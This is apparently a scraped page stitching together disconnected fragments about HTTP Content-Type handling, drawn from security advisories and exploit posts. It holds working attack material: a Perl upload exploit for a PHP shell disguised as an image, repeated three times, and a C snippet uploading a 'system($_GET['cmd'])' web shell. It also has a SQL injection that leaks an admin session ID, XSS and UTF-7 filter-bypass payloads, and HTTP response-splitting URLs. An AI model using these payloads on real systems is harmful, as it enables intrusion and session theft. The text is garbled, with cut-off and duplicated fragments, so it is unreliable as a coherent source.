Next Page >>
content/type
From: <msnmsgr:bbbbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157
IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\";
filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data;
name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
Survey: "MIME/Content-Type-Sniffing" Issues in Image Uploads in Forum Scripts
Author: Jacques Copeau
Abstract
====================================================
Internet Explorer, especially versions 7 and 6, can be tricked to treat images
as html, opening XSS vulnerabilities in software that allows uploads.
IN a survey, we found myBB, fluxBB, phorum, SMF and WBB to be vulnerable to
such attacks.
----
some wireshark's dump samples:
POST /upload_api.php HTTP/1.1
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
brlc> == What is MIME? ==
brlc> MIME is the standard format for email-messages. One could say, MIME is for
brlc> email, what html is for the web. The first RFC for MIME was published in
brlc> 1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
brlc> MIME is a recursive data format. MIME objects consist of a header and a
brlc> body, where the content-type field of the header specifies the type of the
brlc> body. The body can consist of several separated MIME-objects, a single
brlc> MIME-object, a block of text, an encoded image or about anything specified
brlc> in the header. It is possible to read some real-world examples by opening
brlc> some emails and hitting "show source".
== What is MIME? ==
MIME is the standard format for email-messages. One could say, MIME is for
email, what html is for the web. The first RFC for MIME was published in
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME-objects, a single
MIME-object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".
TECHNICAL BACKGROUND
The Proof of Concepts below exploit the aforementioned issue by taking
advantage of other features of Internet Explorer. Keep in mind that:
* Besides the common web content types (such as plain http, image, audio
and video) the browser is also able to render other standardized content
types, among them, MIME HTML or mhtml. And, overriding the way IE
chooses to render a file (described in [3]) presents a way to enforce
the rendering type as MIME HTML by using the protocol handler for mhtml
in the following manner:
More : http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html
- -Source code from mod_autoindex.c--------------
#if APR_HAS_UNICODE_FS
ap_set_content_type(r, "text/html;charset=utf-8");
#else
ap_set_content_type(r, "text/html");
#endif
- -Source code from mod_autoindex.c--------------
used by scheme-specific and producer-specific algorithms for
delimiting data subcomponents within a URI."
A previous writer has correctly noted that Microsoft recommends just the opposite: that "+" characters should be percent-encoded.
Below are the responses to your test URL from various versions of Apache servers on different platforms. Note that the iso-8859-1 charset is specified by the Content-Type header in all cases. The last example is with Apache 2.2.8 modified to include a <meta http-equiv> tag in the body. The behavior remains the same in both Firefox or IE with this change.
It is a problem for web server developers when a vulnerability is accepted and propagated with a description like:
"here is a malicious URL - the victim must perform these manual steps with it - We leave it to other hackers to upgrade the attack and make it fully automatic."
It is a disappointment that CVE-2008-2168 was accepted so uncritically.
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
21db
<?xml version="1.0" encoding="UTF-8"?>
<eyeMessage>
<action>
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
Content-Length: 140
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme='
If admin is currently logged in, attacker will see his session id in the email field of 'UserSettings' form.
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Who forgot to shut down the VAX VM?
Return-Path: <jamie@recon.cx>
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1"><script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
{"new_user_id":"9"}
rendered as if it belonged to the *Internet Zone* but since the file
containing it is stored in '\\127.0.0.1' it would also be able to access
any other file on the visitor's file system.
The problem is derived from the sequence of actions performed by
Internet Explorer to determine the content-type of the content to be
loaded and the appropriate way to render it. The algorithm followed for
this purpose is described in Microsoft's Knowledgebase article titled
MIME Type Detection in Internet Explorer [4] and implemented in the
function 'FindMimeFromData' in 'URLMON.DLL'[5].
HTTP/1.1 302 Found
Date: Sat, 11 Apr 2009 14:12:11 GMT
Server: Apache
Location: javascript:alert('USH');
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
int main(int argc, char *argv[]) {
int sd;
char code[] = "--AaB03x\r\n"
"Content-Disposition: form-data; name=\"doc\"; filename=\"shell.php\"\r\n"
"Content-Type: text/plain\r\n"
"\r\n"
"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"?>\r\n"
"--AaB03x\r\n"
"Content-Disposition: form-data; name=\"desc\"\r\n"
"\r\n"
by another site. An anonymous security researcher, via TippingPoint's
Zero Day Initiative, also independently reported this issue to Mozilla
(CVE-2009-3988).
Mozilla security researcher Georgi Guninski reported that when a SVG
document which is served with Content-Type: application/octet-stream
is embedded into another document via an <embed> tag with
type=image/svg+xml, the Content-Type is ignored and the SVG document
is processed normally. A website which allows arbitrary binary data to
be uploaded but which relies on Content-Type: application/octet-stream
to prevent script execution could have such protection bypassed. An
HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
$this->packet .= 'Host: '.$this->host."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method=='post')
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method=='formdata')
{
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body>
<script>alert('get it?')</script></body></html>
His attack will fail as "<script>" will be filtered to "<sc#ipt>"
However, an attacker can inject a content-type header and overwrite the
page charset and therefore bypass the XSS filter which uses the prior
encoding. A good example for this is with utf-7, the following request:
http://www.linkstofiles.com/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-
Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>
[-] Files affected: documents.php inc/documents_class.php
This bug allows a registered user to upload arbitrary
files on the system. This is possible because there
aren't controls on file extension but on the
Content-Type header only, that can be changed easily.
...
if (isset($_POST['submitadd'])) {
$doc = $_FILES['doc']['name'];
6. *Solutions and Workarounds*
On the server side, you can upgrade to a non-vulnerable version. Onthe
client you can use a browser that obeys the Content-Type header
specified by the server, such as Mozilla Firefox, Google Chrome, Apple
Safari or Opera. Internet Explorer 8 with the XSS Filter won't execute
the malicious scripts.
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
InjectedHeader: BugSec=
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
HTTP Response Splitting
http://server/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text
/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!--
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
Vulnerability Description
=====================
The vulnerability occurs as a result of how the SIP client component handles an incorrectly sip packet. Method of
INVITE or MESSAGE will be ok. MESSAGE is a sip method for Instant Messaging.
After X-Lite receive a malformed packet without "Content-Type" field, we call "Missing Content-Type Vulnerability",
it will be crash.
Solution
========
to be logged in.
Example packet:
POST /contents/service/homepage HTTP/1.1
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Next Page>>
|
